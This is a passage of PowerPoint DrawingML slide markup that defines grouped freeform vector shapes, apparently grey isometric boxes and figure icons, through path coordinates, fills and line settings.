                      <a:solidFill>
                        <a:srgbClr val="6D6D6C"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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60" name="Freeform 2178">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9334CA5F-E889-4E83-949C-9A07F5EBF65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805" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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61" name="Freeform 2179">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE0FB78F-56EF-4A5F-B4ED-25DBE193A07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588" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 451"/>
                          <a:gd name="T1" fmla="*/ 0 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 451"/>
                          <a:gd name="T3" fmla="*/ 468 h 589"/>
                          <a:gd name="T4" fmla="*/ 451 w 451"/>
                          <a:gd name="T5" fmla="*/ 589 h 589"/>
                          <a:gd name="T6" fmla="*/ 451 w 451"/>
                          <a:gd name="T7" fmla="*/ 121 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 451"/>
                          <a:gd name="T9" fmla="*/ 0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1" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="589"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="121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545554"/>
                      </a:solidFill>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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347" name="Group 2180">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{787D41FD-AE3A-4856-ADB6-92E74C64846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155" y="2792"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="2588" y="2910"/>
                      <a:chExt cx="434" cy="341"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2356" name="Freeform 2181">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C016F96-7468-4076-AB07-FD646603272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588" y="2910"/>
                        <a:ext cx="434" cy="117"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 904"/>
                          <a:gd name="T1" fmla="*/ 123 h 244"/>
                          <a:gd name="T2" fmla="*/ 451 w 904"/>
                          <a:gd name="T3" fmla="*/ 0 h 244"/>
                          <a:gd name="T4" fmla="*/ 904 w 904"/>
                          <a:gd name="T5" fmla="*/ 123 h 244"/>
                          <a:gd name="T6" fmla="*/ 451 w 904"/>
                          <a:gd name="T7" fmla="*/ 244 h 244"/>
                          <a:gd name="T8" fmla="*/ 0 w 904"/>
                          <a:gd name="T9" fmla="*/ 123 h 24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904" h="244">
                            <a:moveTo>
                              <a:pt x="0" y="123"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="451" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="904" y="123"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="244"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="123"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="6D6D6C"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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57" name="Freeform 2182">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016A9D08-218A-4D3F-91BB-6B9DB7F55CD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805" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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58" name="Freeform 2183">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BDC0EB7-0BD7-4006-94F9-0DA4FD93D3F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588" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 451"/>
                          <a:gd name="T1" fmla="*/ 0 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 451"/>
                          <a:gd name="T3" fmla="*/ 468 h 589"/>
                          <a:gd name="T4" fmla="*/ 451 w 451"/>
                          <a:gd name="T5" fmla="*/ 589 h 589"/>
                          <a:gd name="T6" fmla="*/ 451 w 451"/>
                          <a:gd name="T7" fmla="*/ 121 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 451"/>
                          <a:gd name="T9" fmla="*/ 0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1" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="589"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="121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545554"/>
                      </a:solidFill>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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348" name="Group 2184">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBDB8E9-79A0-4BD6-BF0E-18B686C8F27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371" y="2850"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="2588" y="2910"/>
                      <a:chExt cx="434" cy="341"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2353" name="Freeform 2185">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E171C79-9ED2-4FBC-B5A5-DA68A817036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588" y="2910"/>
                        <a:ext cx="434" cy="117"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 904"/>
                          <a:gd name="T1" fmla="*/ 123 h 244"/>
                          <a:gd name="T2" fmla="*/ 451 w 904"/>
                          <a:gd name="T3" fmla="*/ 0 h 244"/>
                          <a:gd name="T4" fmla="*/ 904 w 904"/>
                          <a:gd name="T5" fmla="*/ 123 h 244"/>
                          <a:gd name="T6" fmla="*/ 451 w 904"/>
                          <a:gd name="T7" fmla="*/ 244 h 244"/>
                          <a:gd name="T8" fmla="*/ 0 w 904"/>
                          <a:gd name="T9" fmla="*/ 123 h 24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904" h="244">
                            <a:moveTo>
                              <a:pt x="0" y="123"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="451" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="904" y="123"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="244"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="123"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="6D6D6C"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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54" name="Freeform 2186">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5962B495-33D4-4499-A1C2-9A2F73D6EC9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805" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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55" name="Freeform 2187">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA93349-BB00-4DE9-A914-BC68BCF209C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588" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 451"/>
                          <a:gd name="T1" fmla="*/ 0 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 451"/>
                          <a:gd name="T3" fmla="*/ 468 h 589"/>
                          <a:gd name="T4" fmla="*/ 451 w 451"/>
                          <a:gd name="T5" fmla="*/ 589 h 589"/>
                          <a:gd name="T6" fmla="*/ 451 w 451"/>
                          <a:gd name="T7" fmla="*/ 121 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 451"/>
                          <a:gd name="T9" fmla="*/ 0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1" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="589"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="121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545554"/>
                      </a:solidFill>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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349" name="Group 2188">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586E7309-E31A-4D16-8A24-C704789F4B6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588" y="2909"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="2588" y="2910"/>
                      <a:chExt cx="434" cy="341"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2350" name="Freeform 2189">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDAA7FD7-ECE1-4FBE-AFD2-57D6B4D46A8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588" y="2910"/>
                        <a:ext cx="434" cy="117"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 904"/>
                          <a:gd name="T1" fmla="*/ 123 h 244"/>
                          <a:gd name="T2" fmla="*/ 451 w 904"/>
                          <a:gd name="T3" fmla="*/ 0 h 244"/>
                          <a:gd name="T4" fmla="*/ 904 w 904"/>
                          <a:gd name="T5" fmla="*/ 123 h 244"/>
                          <a:gd name="T6" fmla="*/ 451 w 904"/>
                          <a:gd name="T7" fmla="*/ 244 h 244"/>
                          <a:gd name="T8" fmla="*/ 0 w 904"/>
                          <a:gd name="T9" fmla="*/ 123 h 24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904" h="244">
                            <a:moveTo>
                              <a:pt x="0" y="123"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="451" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="904" y="123"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="244"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="123"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="6D6D6C"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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51" name="Freeform 2190">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBD7A9ED-7A2E-4066-924A-FD025707A0D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805" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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52" name="Freeform 2191">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8F1804-92F5-427F-A282-22D3B6AB3FE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2588" y="2969"/>
                        <a:ext cx="217" cy="282"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 451"/>
                          <a:gd name="T1" fmla="*/ 0 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 451"/>
                          <a:gd name="T3" fmla="*/ 468 h 589"/>
                          <a:gd name="T4" fmla="*/ 451 w 451"/>
                          <a:gd name="T5" fmla="*/ 589 h 589"/>
                          <a:gd name="T6" fmla="*/ 451 w 451"/>
                          <a:gd name="T7" fmla="*/ 121 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 451"/>
                          <a:gd name="T9" fmla="*/ 0 h 58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451" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="589"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="451" y="121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545554"/>
                      </a:solidFill>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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2341" name="Group 2192">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF723A6D-9EC1-4B8A-BD52-E54F6AE3A04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277" y="2587"/>
                    <a:ext cx="266" cy="635"/>
                    <a:chOff x="4659" y="1323"/>
                    <a:chExt cx="266" cy="635"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2342" name="Freeform 2193">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DFEE771-B521-4FB8-A10C-15FAD05AF5D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4726" y="1629"/>
                      <a:ext cx="121" cy="329"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 89 w 90"/>
                        <a:gd name="T1" fmla="*/ 156 h 245"/>
                        <a:gd name="T2" fmla="*/ 90 w 90"/>
                        <a:gd name="T3" fmla="*/ 7 h 245"/>
                        <a:gd name="T4" fmla="*/ 89 w 90"/>
                        <a:gd name="T5" fmla="*/ 5 h 245"/>
                        <a:gd name="T6" fmla="*/ 63 w 90"/>
                        <a:gd name="T7" fmla="*/ 20 h 245"/>
                        <a:gd name="T8" fmla="*/ 12 w 90"/>
                        <a:gd name="T9" fmla="*/ 10 h 245"/>
                        <a:gd name="T10" fmla="*/ 3 w 90"/>
                        <a:gd name="T11" fmla="*/ 0 h 245"/>
                        <a:gd name="T12" fmla="*/ 3 w 90"/>
                        <a:gd name="T13" fmla="*/ 36 h 245"/>
                        <a:gd name="T14" fmla="*/ 2 w 90"/>
                        <a:gd name="T15" fmla="*/ 205 h 245"/>
                        <a:gd name="T16" fmla="*/ 44 w 90"/>
                        <a:gd name="T17" fmla="*/ 204 h 245"/>
                        <a:gd name="T18" fmla="*/ 45 w 90"/>
                        <a:gd name="T19" fmla="*/ 51 h 245"/>
                        <a:gd name="T20" fmla="*/ 36 w 90"/>
                        <a:gd name="T21" fmla="*/ 39 h 245"/>
                        <a:gd name="T22" fmla="*/ 45 w 90"/>
                        <a:gd name="T23" fmla="*/ 51 h 245"/>
                        <a:gd name="T24" fmla="*/ 44 w 90"/>
                        <a:gd name="T25" fmla="*/ 204 h 245"/>
                        <a:gd name="T26" fmla="*/ 44 w 90"/>
                        <a:gd name="T27" fmla="*/ 211 h 245"/>
                        <a:gd name="T28" fmla="*/ 88 w 90"/>
                        <a:gd name="T29" fmla="*/ 218 h 245"/>
                        <a:gd name="T30" fmla="*/ 89 w 90"/>
                        <a:gd name="T31" fmla="*/ 156 h 24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90" h="245">
                          <a:moveTo>
                            <a:pt x="89" y="156"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="89" y="140"/>
                            <a:pt x="90" y="47"/>
                            <a:pt x="90" y="7"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="89" y="6"/>
                            <a:pt x="89" y="6"/>
                            <a:pt x="89" y="5"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="87" y="16"/>
                            <a:pt x="71" y="22"/>
                            <a:pt x="63" y="20"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="55" y="19"/>
                            <a:pt x="24" y="13"/>
                            <a:pt x="12" y="10"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="6" y="9"/>
                            <a:pt x="4" y="4"/>
                            <a:pt x="3" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="2" y="18"/>
                            <a:pt x="3" y="32"/>
                            <a:pt x="3" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="3" y="49"/>
                            <a:pt x="0" y="181"/>
                            <a:pt x="2" y="205"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="3" y="228"/>
                            <a:pt x="43" y="224"/>
                            <a:pt x="44" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="43" y="170"/>
                            <a:pt x="46" y="55"/>
                            <a:pt x="45" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="45" y="47"/>
                            <a:pt x="36" y="46"/>
                            <a:pt x="36" y="39"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="46"/>
                            <a:pt x="45" y="47"/>
                            <a:pt x="45" y="51"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="55"/>
                            <a:pt x="43" y="170"/>
                            <a:pt x="44" y="204"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="44" y="206"/>
                            <a:pt x="44" y="211"/>
                            <a:pt x="44" y="211"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="245"/>
                            <a:pt x="87" y="235"/>
                            <a:pt x="88" y="218"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="90" y="201"/>
                            <a:pt x="88" y="171"/>
                            <a:pt x="89" y="15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50000">
                          <a:schemeClr val="bg1">
                            <a:gamma/>
                            <a:shade val="85882"/>
                            <a:invGamma/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="bg1"/>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="0" scaled="1"/>
                    </a:gra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43" name="Freeform 2194">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6911B77C-7141-46B4-BD6F-CD55956FBE1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4659" y="1409"/>
                      <a:ext cx="266" cy="310"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 192 w 198"/>
                        <a:gd name="T1" fmla="*/ 194 h 231"/>
                        <a:gd name="T2" fmla="*/ 169 w 198"/>
                        <a:gd name="T3" fmla="*/ 49 h 231"/>
                        <a:gd name="T4" fmla="*/ 143 w 198"/>
                        <a:gd name="T5" fmla="*/ 24 h 231"/>
                        <a:gd name="T6" fmla="*/ 100 w 198"/>
                        <a:gd name="T7" fmla="*/ 12 h 231"/>
                        <a:gd name="T8" fmla="*/ 60 w 198"/>
                        <a:gd name="T9" fmla="*/ 2 h 231"/>
                        <a:gd name="T10" fmla="*/ 30 w 198"/>
                        <a:gd name="T11" fmla="*/ 11 h 231"/>
                        <a:gd name="T12" fmla="*/ 4 w 198"/>
                        <a:gd name="T13" fmla="*/ 159 h 231"/>
                        <a:gd name="T14" fmla="*/ 36 w 198"/>
                        <a:gd name="T15" fmla="*/ 168 h 231"/>
                        <a:gd name="T16" fmla="*/ 54 w 198"/>
                        <a:gd name="T17" fmla="*/ 47 h 231"/>
                        <a:gd name="T18" fmla="*/ 53 w 198"/>
                        <a:gd name="T19" fmla="*/ 164 h 231"/>
                        <a:gd name="T20" fmla="*/ 62 w 198"/>
                        <a:gd name="T21" fmla="*/ 174 h 231"/>
                        <a:gd name="T22" fmla="*/ 113 w 198"/>
                        <a:gd name="T23" fmla="*/ 188 h 231"/>
                        <a:gd name="T24" fmla="*/ 140 w 198"/>
                        <a:gd name="T25" fmla="*/ 169 h 231"/>
                        <a:gd name="T26" fmla="*/ 140 w 198"/>
                        <a:gd name="T27" fmla="*/ 169 h 231"/>
                        <a:gd name="T28" fmla="*/ 138 w 198"/>
                        <a:gd name="T29" fmla="*/ 87 h 231"/>
                        <a:gd name="T30" fmla="*/ 136 w 198"/>
                        <a:gd name="T31" fmla="*/ 70 h 231"/>
                        <a:gd name="T32" fmla="*/ 136 w 198"/>
                        <a:gd name="T33" fmla="*/ 69 h 231"/>
                        <a:gd name="T34" fmla="*/ 136 w 198"/>
                        <a:gd name="T35" fmla="*/ 70 h 231"/>
                        <a:gd name="T36" fmla="*/ 138 w 198"/>
                        <a:gd name="T37" fmla="*/ 87 h 231"/>
                        <a:gd name="T38" fmla="*/ 159 w 198"/>
                        <a:gd name="T39" fmla="*/ 203 h 231"/>
                        <a:gd name="T40" fmla="*/ 192 w 198"/>
                        <a:gd name="T41" fmla="*/ 194 h 23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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="198" h="231">
                          <a:moveTo>
                            <a:pt x="192" y="194"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="189" y="184"/>
                            <a:pt x="172" y="67"/>
                            <a:pt x="169" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="166" y="32"/>
                            <a:pt x="151" y="26"/>
                            <a:pt x="143" y="24"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="135" y="21"/>
                            <a:pt x="113" y="16"/>
                            <a:pt x="100" y="12"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="88" y="9"/>
                            <a:pt x="69" y="3"/>
                            <a:pt x="60" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="51" y="0"/>
                            <a:pt x="33" y="3"/>
                            <a:pt x="30" y="11"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="28" y="17"/>
                            <a:pt x="8" y="139"/>
                            <a:pt x="4" y="159"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="180"/>
                            <a:pt x="31" y="184"/>
                            <a:pt x="36" y="168"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="40" y="157"/>
                            <a:pt x="55" y="38"/>
                            <a:pt x="54" y="47"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="54" y="53"/>
                            <a:pt x="53" y="121"/>
                            <a:pt x="53" y="164"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="54" y="169"/>
                            <a:pt x="56" y="173"/>
                            <a:pt x="62" y="174"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="74" y="177"/>
                            <a:pt x="106" y="187"/>
                            <a:pt x="113" y="188"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="121" y="190"/>
                            <a:pt x="137" y="180"/>
                            <a:pt x="140" y="169"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="140" y="169"/>
                            <a:pt x="140" y="169"/>
                            <a:pt x="140" y="169"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="140" y="141"/>
                            <a:pt x="140" y="110"/>
                            <a:pt x="138" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="137" y="78"/>
                            <a:pt x="137" y="73"/>
                            <a:pt x="136" y="70"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="69"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="69"/>
                            <a:pt x="136" y="70"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
